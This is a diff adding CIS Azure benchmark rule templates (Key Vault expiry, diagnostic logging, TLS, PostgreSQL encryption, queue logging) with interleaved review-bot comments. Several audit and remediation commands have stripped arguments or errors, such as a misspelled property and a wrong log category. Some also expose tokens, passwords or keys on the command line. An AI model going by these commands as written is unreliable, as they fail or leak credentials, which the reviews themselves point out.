@@ -0,0 +1,38 @@ +{ + "id": "5ecb8a19-541a-5578-9b9d-b22c1bfbc5e9", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "Secrets cannot be used beyond their assigned expiry date respectively. Secrets need to be rotated periodically wherever they are used.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/key-vault/key-vault-whatis\n2. https://docs.microsoft.com/en-us/rest/api/keyvault/about-keys--secrets-and-certificates#key-vault-secrets\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-6-use-a-secure-key-management-process\n4. https://docs.microsoft.com/en-us/powershell/module/az.keyvault/set-azkeyvaultsecretattribute?view=azps-0.10.0", + "id": "5ecb8a19-541a-5578-9b9d-b22c1bfbc5e9", + "name": "Ensure that the Expiration Date is set for all Secrets in RBAC Key Vaults", + "profile_applicability": "* Level 1", + "description": "Ensure that all Secrets in Role Based Access Control (RBAC) Azure Key Vaults have an expiration date set.", + "rationale": "The Azure Key Vault enables users to store and keep secrets within the Microsoft Azure environment.\nSecrets in the Azure Key Vault are octet sequences with a maximum size of 25k bytes each.\nThe `exp` (expiration date) attribute identifies the expiration date on or after which the secret MUST NOT be used.\nBy default, secrets never expire.\nIt is thus recommended to rotate secrets in the key vault and set an explicit expiration date for all secrets.\nThis ensures that the secrets cannot be used beyond their assigned lifetimes.", + "audit": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Secrets`.\n3. In the main pane, ensure that the status of the secret is `Enabled`.\n4. 
For each enabled secret, ensure that an appropriate `Expiration date` is set.\n\n**From Azure CLI:**\n\nEnsure that the output of the below command contains ID (id), enabled status as `true` and Expiration date (expires) is not empty or null:\n\n```\naz keyvault secret list --vault-name --query '[*].{\"kid\":kid,\"enabled\":attributes.enabled,\"expires\":attributes.expires}'\n```\n\n**From PowerShell:**\n\nRetrieve a list of Key vaults:\n\n```\nGet-AzKeyVault\n```\n\nFor each Key vault, run the following command to determine which vaults are configured to use RBAC:\n\n```\nGet-AzKeyVault -VaultName \n```\n\nFor each Key vault with the `EnableRbacAuthorizatoin` setting set to `True`, run the following command:\n\n```\nGet-AzKeyVaultSecret -VaultName \n```\n\nMake sure the `Expires` setting is configured with a value as appropriate wherever the `Enabled` setting is set to `True`.", + "remediation": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Secrets`.\n3. In the main pane, ensure that the status of the secret is `Enabled`.\n4. For each enabled secret, ensure that an appropriate `Expiration date` is set.\n\n**From Azure CLI:**\n\nUpdate the Expiration date for the secret using the below command:\n\n```\naz keyvault secret set-attributes --name --vault-name --expires Y-m-d'T'H:M:S'Z'\n```\n\nNote:\nTo view the expiration date on all secrets in a Key Vault using Microsoft API, the `List` Key permission is required.\n\nTo update the expiration date for the secrets:\n5. Go to the Key vault, click on `Access Control (IAM)`.\n6. 
Click on `Add role assignment` and assign the role of `Key Vault Secrets Officer` to the appropriate user.\n\n**From PowerShell:**\n\n```\nSet-AzKeyVaultSecretAttribute -VaultName -Name -Expires \n```", + "section": "Key Vault", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 8.3", + "Key Vault" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "8.3", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_8_3" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/66cdd4cc-5870-50e1-959c-91443716b87a.json b/packages/cloud_security_posture/kibana/csp_rule_template/66cdd4cc-5870-50e1-959c-91443716b87a.json new file mode 100644 index 00000000000..254b960ee09 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/66cdd4cc-5870-50e1-959c-91443716b87a.json 
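Review bot: The PowerShell audit filters on `EnableRbacAuthorizatoin` (typo), a property name that does not exist, so an operator following the text to select RBAC vaults would match nothing; change it to `EnableRbacAuthorization`. The CLI audit sentence says the output should contain `ID (id)` but the JMESPath projects `"kid":kid`, which is the key identifier and is normally empty for plain secrets; project `id` (or `name`) instead so each secret in the listing is identifiable. The remediation's portal steps 1–4 merely repeat the audit instead of setting a date, and steps 5–6 (assigning `Key Vault Secrets Officer`) are placed after the CLI block and read as part of it — move them into the portal list as a prerequisite and make step 4 `Set an appropriate expiration date on each enabled secret`. The CLI and PowerShell examples are missing their `<secret-name>`/`<vault-name>` placeholders and `-Expires` has no value.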
@@ -0,0 +1,38 @@ +{ + "id": "66cdd4cc-5870-50e1-959c-91443716b87a", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/key-vault/general/howto-logging\n2. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-8-ensure-security-of-key-and-certificate-repository\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-3-enable-logging-for-security-investigation", + "id": "66cdd4cc-5870-50e1-959c-91443716b87a", + "name": "Ensure that logging for Azure Key Vault is 'Enabled'", + "profile_applicability": "* Level 1", + "description": "Enable AuditEvent logging for key vault instances to ensure interactions with key vaults are logged and available.", + "rationale": "Monitoring how and when key vaults are accessed, and by whom, enables an audit trail of interactions with confidential information, keys, and certificates managed by Azure Keyvault.\nEnabling logging for Key Vault saves information in an Azure storage account which the user provides.\nThis creates a new container named insights-logs-auditevent automatically for the specified storage account.\nThis same storage account can be used for collecting logs for multiple key vaults.", + "audit": "**From Azure Portal**\n\n1. Go to `Key vaults`\n2. For each Key vault\n3. Go to `Diagnostic settings`\n4. Click on `Edit Settings`\n5. Ensure that `Archive to a storage account` is `Enabled`\n6. 
Ensure that `AuditEvent` is checked, and the retention days is set to `180 days` or as appropriate\n\n**From Azure CLI**\n\nList all key vaults\n\n```\naz keyvault list\n```\n\nFor each keyvault `id`\n```\naz monitor diagnostic-settings list --resource \n```\n\nEnsure that `storageAccountId` is set as appropriate.\nAlso, ensure that `category` and `days` are set.\nOne of the sample outputs is as below.\n\n```\n\"logs\": [\n {\n \"category\": \"AuditEvent\",\n \"enabled\": true,\n \"retentionPolicy\": {\n \"days\": 180,\n \"enabled\": true\n }\n}\n ]\n```\n\n**From PowerShell** \n\nList the key vault(s) in the subscription\n\n```\nGet-AzKeyVault\n```\n\nFor each key vault, run the following: \n\n```\nGet-AzDiagnosticSetting -ResourceId \n```\n\nEnsure that `StorageAccountId`, `ServiceBusRuleId`, `MarketplacePartnerId`, or `WorkspaceId` is set as appropriate.\nAlso, ensure that `enabled` is set to `true`, and that `category` and `days` are set under the `Log` heading.", + "remediation": "**From Azure Portal**\n\n1. Go to `Key vaults`\n2. Select a Key vault\n3. Select `Diagnostic settings`\n4. Click on `Edit setting` against an existing diagnostic setting, or `Add diagnostic setting`\n5. If creating a new diagnostic setting, provide a name\n6. Check `Archive to a storage account`\n7. Under Categories, check `Audit Logs`\n8. Set an appropriate value for `Retention (days)`\n9. 
Click `Save`\n\n**From Azure CLI**\n\nTo update an existing `Diagnostic Settings`\n```\naz monitor diagnostic-settings update --name \"\" --resource --set retentionPolicy.days=90\n```\n\nTo create a new `Diagnostic Settings`\n\n```\naz monitor diagnostic-settings create --name --resource --logs \"[{category:AuditEvents,enabled:true,retention-policy:{enabled:true,days:180}}]\" --metrics \"[{category:AllMetrics,enabled:true,retention-policy:{enabled:true,days:180}}]\" <[--event-hub --event-hub-rule | --storage-account |--workspace | --marketplace-partner-id ]>\n```\n\n**From PowerShell**\n\nCreate the `Log` settings object\n\n```\n$logSettings = @()\n$logSettings += New-AzDiagnosticSettingLogSettingsObject -Enabled $true -RetentionPolicyDay 180 -RetentionPolicyEnabled $true -Category AuditEvent\n```\n\nCreate the `Metric` settings object\n\n```\n$metricSettings = @()\n$metricSettings += New-AzDiagnosticSettingMetricSettingsObject -Enabled $true -RetentionPolicyDay 180 -RetentionPolicyEnabled $true -Category AllMetrics\n```\n\nCreate the `Diagnostic Settings` for each `Key Vault`\n\n```\nNew-AzDiagnosticSetting -Name \"\" -ResourceId -Log $logSettings -Metric $metricSettings [-StorageAccountId | -EventHubName -EventHubAuthorizationRuleId | -WorkSpaceId | -MarketPlacePartnerId ]\n```", + "section": "Configuring Diagnostic Settings", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 5.1.5", + "Configuring Diagnostic Settings" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "5.1.5", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_5_1_5" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file 
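Review bot: The CLI `az monitor diagnostic-settings create` remediation uses `category:AuditEvents`, but the audit's sample output, the PowerShell `-Category AuditEvent` and the Key Vault log category are `AuditEvent`; the plural will either be rejected or create a setting that does not capture the audit log, so change it to `category:AuditEvent`. The `update` example sets `retentionPolicy.days=90` while the audit expects `180 days` and the `create`/PowerShell examples use 180 — pick one value so the remediation does not produce a setting the audit then fails. Portal audit step 5 requires `Archive to a storage account`, yet the PowerShell audit accepts `StorageAccountId`, `ServiceBusRuleId`, `MarketplacePartnerId`, or `WorkspaceId` as sufficient; if a Log Analytics or Event Hub destination is acceptable (as the CLI create syntax suggests), the portal text should say so rather than imply storage is mandatory. Placeholders such as `<diagnostic-setting-name>` and `<key-vault-resource-id>` have been stripped from every command.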
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/69ffe7f6-bc09-5019-ba77-a2f81169e9de.json b/packages/cloud_security_posture/kibana/csp_rule_template/69ffe7f6-bc09-5019-ba77-a2f81169e9de.json
new file mode 100644
index 00000000000..3e0b1e70afc
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/69ffe7f6-bc09-5019-ba77-a2f81169e9de.json
@@ -0,0 +1,38 @@ +{ + "id": "69ffe7f6-bc09-5019-ba77-a2f81169e9de", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/security-center/security-center-data-security\n2. https://docs.microsoft.com/en-us/azure/security-center/security-center-enable-data-collection\n3. https://msdn.microsoft.com/en-us/library/mt704062.aspx\n4. https://msdn.microsoft.com/en-us/library/mt704063.aspx\n5. https://docs.microsoft.com/en-us/rest/api/securitycenter/autoprovisioningsettings/list\n6. https://docs.microsoft.com/en-us/rest/api/securitycenter/autoprovisioningsettings/create\n7. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-5-centralize-security-log-management-and-analysis\n8. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-3-enable-logging-for-security-investigation\n9. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-incident-response#ir-2-preparation--setup-incident-notification", + "id": "69ffe7f6-bc09-5019-ba77-a2f81169e9de", + "name": "Ensure that Auto provisioning of 'Log Analytics agent for Azure VMs' is Set to 'On'", + "profile_applicability": "* Level 1", + "description": "Enable automatic provisioning of the monitoring agent to collect security data.", + "rationale": "When `Log Analytics agent for Azure VMs` is turned on, Microsoft Defender for Cloud provisions the Microsoft Monitoring Agent on all existing supported Azure virtual machines and any new ones that are created.\nThe Microsoft Monitoring Agent scans for various security-related configurations and events such as system updates, OS vulnerabilities, endpoint protection, and provides alerts.", + "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Then `Environment Settings`\n4. 
Select a subscription\n5. Click on `Settings & Monitoring`\n6. Ensure that `Log Analytics agent/Azure Monitor agent` is set to `On`\n\nRepeat the above for any additional subscriptions.\n\n**From Azure CLI**\n\nEnsure the output of the below command is `On`\n\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X GET -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions//providers/Microsoft.Security/autoProvisioningSettings?api-version=2017-08-01-preview' | jq '.|.value[] | select(.name==\"default\")'|jq '.properties.autoProvision'\n```\n\n**Using PowerShell**\n```\nConnect-AzAccount\nGet-AzSecurityAutoProvisioningSetting\n```\nEnsure output for `Id Name AutoProvision` is `/subscriptions//providers/Microsoft.Security/autoProvisioningSettings/default default On`", + "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Select `Environment Settings`\n4. Select a subscription\n5. Click on `Settings & Monitoring`\n6. 
Ensure that `Log Analytics agent for Azure VMs` is set to `On`\n\nRepeat the above for any additional subscriptions.\n\n**From Azure CLI**\n\nUse the below command to set `Automatic provisioning of monitoring agent` to `On`.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X PUT -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/subscriptionID/providers/Microsoft.Security/autoProvisioningSettings/default?api-version=2017-08-01-preview -d@\"input.json\"'\n```\nWhere `input.json` contains the Request body json data as mentioned below.\n```\n {\n \"id\": \"/subscriptions//providers/Microsoft.Security/autoProvisioningSettings/default\",\n \"name\": \"default\",\n \"type\": \"Microsoft.Security/autoProvisioningSettings\",\n \"properties\": {\n \"autoProvision\": \"On\"\n }\n}\n```", + "section": "Microsoft Defender for Cloud", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 2.1.15", + "Microsoft Defender for Cloud" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "2.1.15", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_2_1_15" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/6e6481f1-5ede-552b-84e5-cceed281052a.json b/packages/cloud_security_posture/kibana/csp_rule_template/6e6481f1-5ede-552b-84e5-cceed281052a.json new file mode 100644 index 00000000000..404af7ccd64 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/6e6481f1-5ede-552b-84e5-cceed281052a.json 
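Review bot: The CLI audit and remediation pipe `az account get-access-token` output through `xargs -L1 bash -c 'curl ... -H "Authorization: Bearer $1" ...'`, which puts the ARM bearer token on the `bash`/`curl` command line where it is visible to every local user via `ps` and ends up in shell history and trace logs; prefer `az rest --method get --url "https://management.azure.com/subscriptions/<subscription-id>/providers/Microsoft.Security/autoProvisioningSettings?api-version=2017-08-01-preview"`, which uses the CLI's own credential, or pass the header via a file. The audit URL reads `subscriptions//providers/...` with an empty subscription segment, and the remediation uses the literal `subscriptionID`; with the `subscription<TAB>accessToken` tsv the query produces, the subscription id would be `$0`, so either substitute it (`subscriptions/$0/providers/...`) or restore a `<subscription-id>` placeholder, otherwise neither command targets a subscription. The portal step label differs between audit (`Log Analytics agent/Azure Monitor agent`) and remediation (`Log Analytics agent for Azure VMs`); confirm which label the current Defender for Cloud blade shows and use it in both.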
@@ -0,0 +1,38 @@ +{ + "id": "6e6481f1-5ede-552b-84e5-cceed281052a", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/app-service/app-service-web-tutorial-custom-ssl#enforce-tls-versions\n2. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-3-encrypt-sensitive-data-in-transit\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-network-security#ns-8-detect-and-disable-insecure-services-and--protocols\n4. https://docs.microsoft.com/en-us/powershell/module/az.websites/set-azwebapp?view=azps-8.1.0", + "id": "6e6481f1-5ede-552b-84e5-cceed281052a", + "name": "Ensure Web App is using the latest version of TLS encryption", + "profile_applicability": "* Level 1", + "description": "The TLS (Transport Layer Security) protocol secures transmission of data over the internet using standard encryption technology.\nEncryption should be set with the latest version of TLS.\nApp service allows TLS 1.2 by default, which is the recommended TLS level by industry standards such as PCI DSS.", + "rationale": "App service currently allows the web app to set TLS versions 1.0, 1.1 and 1.2.\nIt is highly recommended to use the latest TLS 1.2 version for web app secure connections.", + "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com \n2. Go to `App Services`\n3. Click on each App\n4. Under `Setting` section, Click on `TLS/SSL settings`\n5. 
Under the `Bindings` pane, ensure that `Minimum TLS Version` set to `1.2` under `Protocol Settings`\n\n**From Azure CLI**\n\nTo check TLS Version for an existing app, run the following command,\n```\naz webapp config show --resource-group --name --query minTlsVersion\n```\n\nThe output should return `1.2` if TLS Version is set to `1.2` (Which is currently the latest version).\n\n**From PowerShell**\n\nList all web apps.\n\n```\nGet-AzWebApp\n```\n\nFor each web app run the following command.\n\n```\nGet-AzWebApp -ResourceGroupName -Name |Select-Object -ExpandProperty SiteConfig\n```\n\nMake sure the `minTlsVersion` is set to at least `1.2`.", + "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com \n2. Go to `App Services`\n3. Click on each App\n4. Under `Setting` section, Click on `SSL settings`\n5. Under the `Bindings` pane, set `Minimum TLS Version` to `1.2` under `Protocol Settings` section\n\n**From Azure CLI**\n\nTo set TLS Version for an existing app, run the following command:\n```\naz webapp config set --resource-group --name --min-tls-version 1.2\n```\n\n**From PowerShell**\n\n```\nSet-AzWebApp -ResourceGroupName -Name -MinTlsVersion 1.2\n```", + "section": "AppService", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 9.3", + "AppService" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "9.3", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_9_3" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/70f92ed3-5659-5c95-a8f8-a63211c57635.json b/packages/cloud_security_posture/kibana/csp_rule_template/70f92ed3-5659-5c95-a8f8-a63211c57635.json new file mode 100644 index 00000000000..8ab89d26d1a --- /dev/null 
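Review bot: The audit is inconsistent about whether `1.2` is an exact or a minimum value: the CLI text says the output `should return 1.2 ... (Which is currently the latest version)` while the PowerShell text says `at least 1.2`, so a reader could fail an app whose minimum is set to a newer version if the platform accepts one. State the criterion once as `minTlsVersion is 1.2 or higher` in both places and drop the `currently the latest version` remark, which will age badly — TLS 1.3 exists as a protocol even if App Service did not expose it when this text was written; confirm against the current `--min-tls-version` choices and, if the `cis_9_3` rego compares for equality, adjust it to `>=`. The portal navigation also differs between audit (`TLS/SSL settings`) and remediation (`SSL settings`); use one label. The `--resource-group`/`--name`/`-ResourceGroupName`/`-Name` placeholders have been stripped from the commands.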
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/70f92ed3-5659-5c95-a8f8-a63211c57635.json 
@@ -0,0 +1,38 @@ +{ + "id": "70f92ed3-5659-5c95-a8f8-a63211c57635", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "The read and write speeds to the database will be impacted if both default encryption and Infrastructure Encryption are checked, as a secondary form of encryption requires more resource overhead for the cryptography of information. This cost is justified for information security.\nCustomer managed keys are recommended for the most secure implementation, leading to overhead of key management. The key will also need to be backed up in a secure location, as loss of the key will mean loss of the information in the database.", + "default_value": "", + "references": "1. https://docs.microsoft.com/en-us/azure/postgresql/howto-double-encryption\n2. https://docs.microsoft.com/en-us/azure/postgresql/concepts-infrastructure-double-encryption\n3. https://docs.microsoft.com/en-us/azure/postgresql/concepts-data-encryption-postgresql\n4. https://docs.microsoft.com/en-us/azure/key-vault/keys/byok-specification\n5. https://docs.microsoft.com/en-us/azure/postgresql/howto-double-encryption\n6. 
https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-4-enable-data-at-rest-encryption-by-default", + "id": "70f92ed3-5659-5c95-a8f8-a63211c57635", + "name": "Ensure 'Infrastructure double encryption' for PostgreSQL Database Server is 'Enabled'", + "profile_applicability": "* Level 1", + "description": "Azure Database for PostgreSQL servers should be created with 'infrastructure double encryption' enabled.", + "rationale": "If Double Encryption is enabled, another layer of encryption is implemented at the hardware level before the storage or network level.\nInformation will be encrypted before it is even accessed, preventing both interception of data in motion if the network layer encryption is broken and data at rest in system resources such as memory or processor cache.\nEncryption will also be in place for any backups taken of the database, so the key will secure access the data in all forms.\nFor the most secure implementation of key based encryption, it is recommended to use a Customer Managed asymmetric RSA 2048 Key in Azure Key Vault.", + "audit": "**From Azure Portal**\n\n1. From Azure Home, click on more services.\n2. Click on Databases.\n3. Click on Azure Database for PostgreSQL servers.\n4. Select the database by clicking on its name.\n5. Under Security, click Data encryption.\n6. Ensure that 'Infrastructure encryption enabled' is displayed and is 'checked'.\n\n**From Azure CLI**\n\n7. Enter the command\n```\naz postgres server configuration show --name --resource-group --query 'properties.infrastructureEncryption' -o tsv\n```\n8. Verify that Infrastructure encryption is enabled.", + "remediation": "It is not possible to enable 'infrastructure double encryption' on an existing Azure Database for PostgreSQL server.\nThe remediation steps detail the creation of a new Azure Database for PostgreSQL server with 'infrastructure double encryption' enabled.\n\n**From Azure Portal**\n\n1. 
Go through the normal process of database creation.\n2. On step 2 titled 'Additional settings' ensure that 'Infrastructure double encryption enabled' is 'checked'.\n3. Acknowledge that you understand this will impact database performance.\n4. Finish database creation as normal.\n\n**From Azure CLI**\n\n```\naz postgres server create --resource-group --name --location --admin-user --admin-password --sku-name GP_Gen4_2 --version 11 --infrastructure-encryption Enabled\n```", + "section": "PostgreSQL Database Server", + "version": "1.0", + "tags": [ + "CIS", + "AZURE", + "CIS 4.3.8", + "PostgreSQL Database Server" + ], + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "version": "v2.0.0", + "id": "cis_azure", + "rule_number": "4.3.8", + "posture_type": "cspm" + }, + "rego_rule_id": "cis_4_3_8" + } + }, + "migrationVersion": { + "csp-rule-template": "8.7.0" + }, + "coreMigrationVersion": "8.7.0" +} \ No newline at end of file diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/737dc646-1c66-5fb6-8fcd-1aac6402532d.json b/packages/cloud_security_posture/kibana/csp_rule_template/737dc646-1c66-5fb6-8fcd-1aac6402532d.json new file mode 100644 index 00000000000..c58db3da041 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/737dc646-1c66-5fb6-8fcd-1aac6402532d.json 
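Review bot: The CLI remediation passes `--admin-password` on the `az postgres server create` command line, which leaves the database administrator password in shell history and visible in `ps` while the command runs; tell the reader to omit the flag and let the CLI prompt, or supply it from an environment variable or secret store, e.g. `--admin-password "$PG_ADMIN_PASSWORD"`. The audit command `az postgres server configuration show --name --resource-group --query 'properties.infrastructureEncryption'` looks wrong for this property: `configuration show` reads a named server parameter and needs `--server-name`, whereas `infrastructureEncryption` is a property of the server resource, so `az postgres server show --resource-group <rg> --name <server> --query infrastructureEncryption -o tsv` is presumably what is meant — confirm. The rationale also claims double encryption prevents `interception of data in motion if the network layer encryption is broken`, but the referenced docs describe infrastructure encryption as a second layer of encryption at rest; drop the in-transit claim so the rule does not overstate its protection.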
@@ -0,0 +1,38 @@
+{
+ "id": "737dc646-1c66-5fb6-8fcd-1aac6402532d",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "Enabling this setting can have a high impact on the cost of the log analytics service and data storage used by logging more data per each request. Do not enable this without determining your need for this level of logging, and do not forget to check in on data usage and projected cost. Some users have seen their logging costs increase from $10 per month to $10,000 per month.",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/rest/api/storageservices/about-storage-analytics-logging\n2. https://docs.microsoft.com/en-us/cli/azure/storage/logging?view=azure-cli-latest\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-4-enable-logging-for-azure-resources\n4. https://docs.microsoft.com/en-us/azure/storage/queues/monitor-queue-storage?tabs=azure-portal",
+ "id": "737dc646-1c66-5fb6-8fcd-1aac6402532d",
+ "name": "Ensure Storage Logging is Enabled for Queue Service for 'Read', 'Write', and 'Delete' requests",
+ "profile_applicability": "* Level 2",
+ "description": "The Storage Queue service stores messages that may be read by any client who has access to the storage account.\nA queue can contain an unlimited number of messages, each of which can be up to 64KB in size using version 2011-08-18 or newer.\nStorage Logging happens server-side and allows details for both successful and failed requests to be recorded in the storage account.\nThese logs allow users to see the details of read, write, and delete operations against the queues.\nStorage Logging log entries contain the following information about individual requests: Timing information such as start time, end-to-end latency, and server latency, authentication details, concurrency information, and the sizes of the request and response messages.",
+ "rationale": "Storage Analytics logs contain detailed information about successful and failed requests to a storage service.\nThis information can be used to monitor individual requests and to diagnose issues with a storage service.\nRequests are logged on a best-effort basis.\n\nStorage Analytics logging is not enabled by default for your storage account.",
+ "audit": "**From Azure Portal:**\n1. Go to `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings (classic)` blade from `Monitoring (classic)` section.\n4. Ensure the `Status` is set to `On`, if set to `Off`.\n5. Select `Queue properties`.\n6. Ensure `Read` `Write` `Delete` options are selected under the `Logging` section.\n\n**From Azure CLI**\n\nEnsure the below command's output contains properties `delete`, `read` and `write` set to `true`.\n```\naz storage logging show --services q --account-name \n```",
+ "remediation": "**From Azure Portal**\n1. Go to `Storage Accounts`.\n2. Select the specific Storage Account.\n3. Click the `Diagnostics settings (classic)` blade from `Monitoring (classic)` section.\n4. Set the `Status` to `On`, if set to `Off`.\n5. Select `Queue properties`.\n6. Select `Read`, `Write` and `Delete` options under the `Logging` section to enable Storage Logging for Queue service.\n\n**From Azure CLI**\n\nUse the below command to enable the Storage Logging for Queue service.\n```\naz storage logging update --account-name --account-key --services q --log rwd --retention 90\n```",
+ "section": "Storage Accounts",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 3.5",
+ "Storage Accounts"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "3.5",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_3_5"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
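Review bot: The CLI commands in the audit and remediation strings have lost their parameter placeholders — `az storage logging show --services q --account-name ` ends with no account name — and every other new rule in this commit (the 7bb02abe…, 87952b8d…, 88734e31…, 89ebec6b…, 9272d2b5…, 97504079…, 9ce2276b… and 9fb9a46f… hunks) shows the same pattern, presumably angle-bracketed tokens stripped during import. As written the commands are not runnable and a reader may not notice an argument is missing; restoring placeholders such as `--account-name <storage-account>` would fix it. Separately, the remediation command takes the storage account key as a command-line argument (`--account-key`), which exposes it to shell history and process listings; the text could instead point readers at supplying the key through the `AZURE_STORAGE_KEY` environment variable, which the `az storage` commands also honour.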
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/7bb02abe-d669-5058-a2d6-6ce5ee2dc2be.json b/packages/cloud_security_posture/kibana/csp_rule_template/7bb02abe-d669-5058-a2d6-6ce5ee2dc2be.json
new file mode 100644
index 00000000000..ea4b61d794c
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/7bb02abe-d669-5058-a2d6-6ce5ee2dc2be.json
@@ -0,0 +1,38 @@
+{
+ "id": "7bb02abe-d669-5058-a2d6-6ce5ee2dc2be",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "Keys cannot be used beyond their assigned expiration dates respectively. Keys need to be rotated periodically wherever they are used.",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/azure/key-vault/key-vault-whatis\n2. https://docs.microsoft.com/en-us/rest/api/keyvault/about-keys--secrets-and-certificates#key-vault-keys\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-6-use-a-secure-key-management-process\n4. https://docs.microsoft.com/en-us/powershell/module/az.keyvault/set-azkeyvaultkeyattribute?view=azps-0.10.0",
+ "id": "7bb02abe-d669-5058-a2d6-6ce5ee2dc2be",
+ "name": "Ensure that the Expiration Date is set for all Keys in Non-RBAC Key Vaults.",
+ "profile_applicability": "* Level 1",
+ "description": "Ensure that all Keys in Non Role Based Access Control (RBAC) Azure Key Vaults have an expiration date set.",
+ "rationale": "Azure Key Vault enables users to store and use cryptographic keys within the Microsoft Azure environment.\nThe `exp` (expiration date) attribute identifies the expiration date on or after which the key MUST NOT be used for a cryptographic operation.\nBy default, keys never expire.\nIt is thus recommended that keys be rotated in the key vault and set an explicit expiration date for all keys.\nThis ensures that the keys cannot be used beyond their assigned lifetimes.",
